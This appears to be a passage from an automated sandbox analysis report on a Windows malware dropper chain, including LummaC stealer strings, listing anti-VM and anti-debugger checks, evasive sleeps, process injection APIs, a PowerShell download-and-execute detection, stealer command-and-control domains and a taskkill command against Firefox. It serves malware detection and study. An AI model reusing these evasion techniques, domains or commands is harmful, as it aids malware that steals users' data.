Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 36F63F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 3E09B6 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Memory allocated: 4CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Memory allocated: 4E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Memory allocated: 6E50000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Code function: 0_2_04CF0DC8 rdtsc 0_2_04CF0DC8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 382 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2996 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5716 Thread sleep count: 382 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5716 Thread sleep time: -11460000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6192 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6192 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 772 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 772 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2724 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5716 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 6624 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 3636 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 5320 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 3964 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 1464 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe TID: 4944 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4228 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe TID: 2472 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe TID: 2472 Thread sleep time: -186000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 6960 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe TID: 5992 Thread sleep time: -150000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.2920009693.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, ea2c7beae0.exe, ea2c7beae0.exe, 00000007.00000002.2463650176.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 6a8d4317d4.exe, 00000008.00000002.2538371767.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730629951.000000000049A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000D.00000002.2679450339.00000000005ED000.00000040.00000400.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2696051122.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, ea2c7beae0.exe, 00000010.00000002.2921950661.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 00000011.00000002.2866146999.0000000001119000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@{
Source: num.exe, 0000000F.00000002.2731328670.0000000001221000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarep:
Source: ea2c7beae0.exe, ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2815175057.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: skotes.exe, 00000006.00000002.2921573681.0000000001437000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: num.exe, 00000013.00000002.2904376187.0000000000C73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP|
Source: 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware8U
Source: h3yRbjNWk1.exe, 00000000.00000002.1721300918.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1758524084.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1760766103.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2920009693.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, ea2c7beae0.exe, 00000007.00000002.2463650176.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 00000008.00000002.2538371767.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730629951.000000000049A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000D.00000002.2679450339.00000000005ED000.00000040.00000400.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2696051122.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, ea2c7beae0.exe, 00000010.00000002.2921950661.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 00000011.00000002.2866146999.0000000001119000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000098A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 6a8d4317d4.exe, 00000011.00000002.2867421028.0000000001669000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2815175057.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000350002\6a8d4317d4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000350002\6a8d4317d4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_053601BA Start: 053602BB End: 053601E3 6_2_053601BA
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Code function: 0_2_04CF0DC8 rdtsc 0_2_04CF0DC8
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B75BB0 LdrInitializeThunk, 7_2_00B75BB0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A8652B mov eax, dword ptr fs:[00000030h] 6_2_00A8652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A8A302 mov eax, dword ptr fs:[00000030h] 6_2_00A8A302
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 4144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 6996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe PID: 3368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 2716, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe, type: DROPPED
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A570A0 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree, 6_2_00A570A0
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Memory written: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: ea2c7beae0.exe String found in binary or memory: licendfilteo.site
Source: ea2c7beae0.exe String found in binary or memory: clearancek.site
Source: ea2c7beae0.exe String found in binary or memory: bathdoomgaz.stor
Source: ea2c7beae0.exe String found in binary or memory: spirittunek.stor
Source: ea2c7beae0.exe String found in binary or memory: dissapoiznw.stor
Source: ea2c7beae0.exe String found in binary or memory: studennotediw.stor
Source: ea2c7beae0.exe String found in binary or memory: mobbipenju.stor
Source: ea2c7beae0.exe String found in binary or memory: eaglepawnoy.stor
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe "C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2919840607.0000000000262000.00000002.00000001.01000000.00000011.sdmp, 8X6R8OO7U6CNLMSAL.exe.11.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ea2c7beae0.exe, 00000007.00000002.2464157606.0000000000D61000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000D.00000002.2679450339.00000000005ED000.00000040.00000400.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2922419882.0000000000D61000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000006.00000002.2920009693.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 8{{Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A6D3E2 cpuid 6_2_00A6D3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000350002\6a8d4317d4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000350002\6a8d4317d4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000401001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000401001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Queries volume information: C:\ VolumeInformation
